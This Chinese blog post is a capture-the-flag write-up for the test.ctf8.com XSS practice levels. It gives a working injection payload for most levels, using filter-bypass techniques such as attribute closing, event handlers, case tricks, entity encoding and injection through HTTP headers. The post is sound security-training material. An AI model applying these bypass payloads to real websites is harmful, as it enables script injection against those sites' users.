test.ctf8 xss注入解题记录

最新推荐文章于 2024-06-07 11:58:48 发布
最新推荐文章于 2024-06-07 11:58:48 发布
阅读量4.3k 收藏 24
点赞数 6
分类专栏: 信息安全练习 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43623492/article/details/105261199
版权

Level 1

页面没有文本框,但可以从URL下手
payload:test.ctf8.com/level1.php?name=<script>alert('ok')</script>
在这里插入图片描述

Level 2

随便输入点什么,查看页面源码,发现我们输入的内容被困在了input的value属性内,那就闭合他们
payload:"><script>alert('ok')</script>
在这里插入图片描述

Level 3

<>被转义,所以不能再用标签,那就给input加一个onfocus事件
payload:' onfocus=alert('ok')//
在这里插入图片描述

Level 4

和上一关相同,只不过value需要用单引号闭合
payload:" onfocus=alert('ok')//
在这里插入图片描述

Level 5

script和onclick都被过滤了,没关系,我们还有a标签
payload:"><a href="javascript:alert('ok')">
在这里插入图片描述

Level 6

script、onclick、href都被过滤了,那试试大小写绕过
payload:"> <SCRIPT>alert('ok')</SCRIPT>
在这里插入图片描述

Level 7

script被替换成了null,那就好办了,将script放到scr和ipt之间,即使script被替换成了null,前后连接依然又是一个script
paylaod:"><scrscriptipt>alert('ok')</scrscriptipt>
在这里插入图片描述

Level 8

script、onclick被屏蔽了并且大小写还不能绕过,那只能请出我们的HTML ASCCI编码来替换r了
paylaod:javasc&#x72;ipt:alert('ok')
在这里插入图片描述

Level 9

可能后台代码限制了输入的格式必须为网址,所以我们必须加一串网址,%0d是urlencode编码的换行
payload:

javasc&#x72;ipt:%0dhttp://www.0aa.me%0dalert('ok')

在这里插入图片描述

Level 10

F12审查元素,发现有三个属性为hidden的表单,我们可以修改URL参数来实现注入
payload:

http://test.ctf8.com/level10.php?t_sort=" type="text" onclick="alert('ok')"

在这里插入图片描述

Level 11

在这里插入图片描述
检查元素的时候发现了隐藏的input标签,抓包看看什么效果
在这里插入图片描述
referer的值就是input的value值,那我们就修改referer
payload:" type="text" onclick="alert('zdy')
在这里插入图片描述
在这里插入图片描述

Level 12

检查元素,发现隐藏的input标签,并且value值就是抓包获取到的User-Agent
在这里插入图片描述在这里插入图片描述
那就修改User-Agent
paylaod:" type="text" onclick="alert('ok')
在这里插入图片描述
在这里插入图片描述

Level 13

检查元素,发现隐藏的input标签,并且value值就是抓包获取到的cookie
在这里插入图片描述
在这里插入图片描述
修改cookie
payload:" type="text" onclick="alert('ok')

在这里插入图片描述
在这里插入图片描述

Level 14 15

这俩题不会…

Level 16

检查元素可以发现有个center标签
在这里插入图片描述这就很奇怪,他放个center标签有什么用?试着向center标签内输入点东西,在URL中输入?keyword=test(你要问我为什么在URL中输入,前几关就是那样),发现它出现在了页面中,那就好办了,直接上img<>被转义了 用UrlEncode编码代替

payload:

test.ctf8.com/level16.php?keyword=%3Cimg%0dsrc=1%0donerror=alert('ok')%3E

在这里插入图片描述

Level 17

检查元素,修改URL内的a为132,发现embed标签的src属性变了,那么注入点就找到了,直接闭合src属性再给他加个点击事件就可以了
在这里插入图片描述
payload:

http://test.ctf8.com/level17.php?arg01=a&arg02=b" onclick=alert('ok')

在这里插入图片描述

Level 18

跟上一关一样检查元素,修改URL内的a为132,发现embed标签的src属性变了,那么注入点就找到了,直接闭合src属性再给他加个点击事件就可以了
在这里插入图片描述
payload:

http://test.ctf8.com/level18.php?arg01=a&arg02=b" onclick=alert('ok')

在这里插入图片描述

Level 19 20

flash xss,没了解过,不会

zhangdy_plus
关注
  • 6
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
test.ctf8(XSS挑战之旅)解题记录
Dexret的博客
12-03 3132
xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc')</script> level2 该题通过查看网页源码可以看出,该题将我们输入得内容插入到value标签中 那么我们可以通过在输入得内容前加入">去闭合value标签成功弹窗 payload "><script>alert(1)&lt..
ctf中文转unicode_CTF/CTF练习平台-XSSxss注入及js unicode编码及innerHTML】
weixin_30842027的博客
02-23 327
原题内容:javascripthttp://103.238.227.13:10089/cssFlag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxxhtml题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入sjava补充了这个,好了,继续作题xss右键源码学习var s="";document.getElementById('s')....
CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
最新发布
jayq1的博客
06-07 1188
XSS
CTF8-XSS闯关 知识点:XSS,JavaScript
m0_51326092的博客
08-04 847
前言 今日心血来潮,把前几个星期发现的XSS闯关拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!! 大佬博客: xss小游戏全通关-答案 test.ctf8 xss注入解题记录 Web安全测试学习笔记 - XSS靶场 - test.ctf8.com HTML实体字符转换 在线编码网站 解题payload: level1:?name=<script>alert(1);</script> level2:?keyword=" οnc
CTF学习笔记——XSS攻击
Obs_cure的博客
08-02 9588
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。[1]百度百科 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,与之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签
XSS实战1(http://test.ctf8.com/)
Bob_Box的博客
04-12 1116
要求:显示弹窗即为过关 level1 通过修改URL中参数name发现页面test也会被修改,尝试修改name的值 ?name=<script>alert(/nice/)</script> level2 存在文本框,输入<script>alert(/nice/)</script>,页面返回如下,F12查看源码 接下来我们输入单引号,结果如下 再然后输入双引号,结果如下 由此得出value值为双引号闭合,尝试闭合标签.
“百度杯”CTF比赛 九月场-----Test
大方子
08-02 1390
========================================= 个人收获: 1.连接shell 失败的时候可以试试多个版本的菜刀,可能是菜刀的问题 2.学会了菜刀数据库管理的配置 ============================================ 题目界面: 这个是个cms,我就直接百度查询到现成的漏洞 漏洞地址:http://0day5...
ctf xss注入.pdf
02-11
根据题目描述:“ctf xss注入”,我们将具体分析一个XSS注入的实际案例,并探讨如何利用XSS进行攻击。 ##### 1. 比较耍赖的方法 题目给出的网址为`http://206.189.214.99:4080/xss/`。首先,通过打开该网址,可以...
test_ctf_
09-30
5. **安全编程**:理解常见的安全漏洞,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF),并学习如何编写安全的代码来防止这些攻击。 6. **逆向工程**:虽然Java不常用于逆向工程,但学习如何反编译Java字节码...
记录ctf解题过程及脚本.zip
10-25
记录ctf解题过程及脚本
xss注入讲解ppt.pptx
08-10
xss 注入讲解ppt xss 是一种常见的 web 应用安全漏洞,能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,从而达到恶意攻击用户的目的。xss 可以追溯到上世纪 90 年代,已经超过缓冲区溢出成为最流行的...
CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 1876
有两个尝试点。
xss-labs靶场一到十关
zxcvbnm123456x的博客
06-26 803
xss的靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习。
跨站脚本xss-test靶场
tlucky的博客
04-14 616
靶场地址:url:http://test.ctf8.com/ Level 1 页面没有文本框,但可以从URL下手 payload:test.ctf8.com/level1.php?name= Level 2 随便输入点什么,查看页面源码,发现我们输入的内容被困在了input的value属性内,那就闭合他们 payload:"> Level 3 <>被转义,所以不能再用标签,那就给input加一个onfocus事件 payload:’ οnfοcus=alert(‘ok’)// Le
[渗透测试笔记] 09.xss挑战之旅专题
H4ppyD0g的博客
02-13 554
网址:http://test.ctf8.com/ level1 通过修改url可以修改页面显示,判断是反射型xss,利用点在url。 payload test.ctf8.com/level1.php?name=<script>alert(1);</script> level2 输入信息在form的input里面,需要把input标签闭合 payload "/&...
【web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2413
XSS-pikachu
【SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 4683
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
xss挑战之旅来重读xss(一)
Sp4rkW的博客
11-08 2430
在开始这篇文章之前,先简单聊几句: xss很多时候是鸡肋,比如说self-xss 很多厂商都会注明拒收反射xss,如58src 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss 遇到收反射xss的,证明截图拿cookies能比alert弹个窗多很多money xss有时候也值很多钱,比如说某厂商的一个存储xss就给了3.5k 其实我们基本上都知道xss是什么,在给厂商提交漏洞的时候,...
CTF/CTF练习平台-XSSxss注入及js unicode编码及innerHTML】
热门推荐
Sp4rkW的博客
08-31 1万+
原题内容: http://103.238.227.13:10089/ Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx 题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s 补充了这个,好了,继续做题 右键源码 &lt;script&gt; var s=""; docu...
CTFhub XSS技能树
07-28
XSS(跨站脚本攻击)技能树是一个由CTFhub创建的学习路径,旨在帮助初学者逐步学习和掌握XSS攻击的技术。以下是XSS技能树的一般路径: 1. 基础知识: - 学习什么是XSS攻击以及它的原理和分类。 - 了解XSS攻击的危害和潜在风险。 - 掌握HTML、CSS和JavaScript的基础知识。 2. 反射型XSS: - 学习如何利用用户输入来注入恶意脚本。 - 理解反射型XSS攻击的工作原理。 - 掌握常见的反射型XSS漏洞利用技巧。 3. 存储型XSS: - 学习如何在目标网站上存储恶意脚本。 - 理解存储型XSS攻击的工作原理。 - 掌握常见的存储型XSS漏洞利用技巧。 4. DOM-based XSS: - 学习DOM(文档对象模型)的基础知识。 - 理解DOM-based XSS攻击的工作原理。 - 掌握常见的DOM-based XSS漏洞利用技巧。 5. 防御措施: - 学习如何防御XSS攻击。 - 了解常见的防御机制,如输入验证、输出编码和内容安全策略(CSP)。 - 掌握安全编码实践,以防止XSS漏洞的出现。 CTFhub提供了一系列的学习资源、挑战和实践环境,帮助学习者在实践中掌握XSS攻击技术。通过完成这个技能树,你将能够更深入地理解和应用XSS攻击。请记住,始终遵守法律和道德规范,只在授权范围内进行安全测试和渗透测试。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值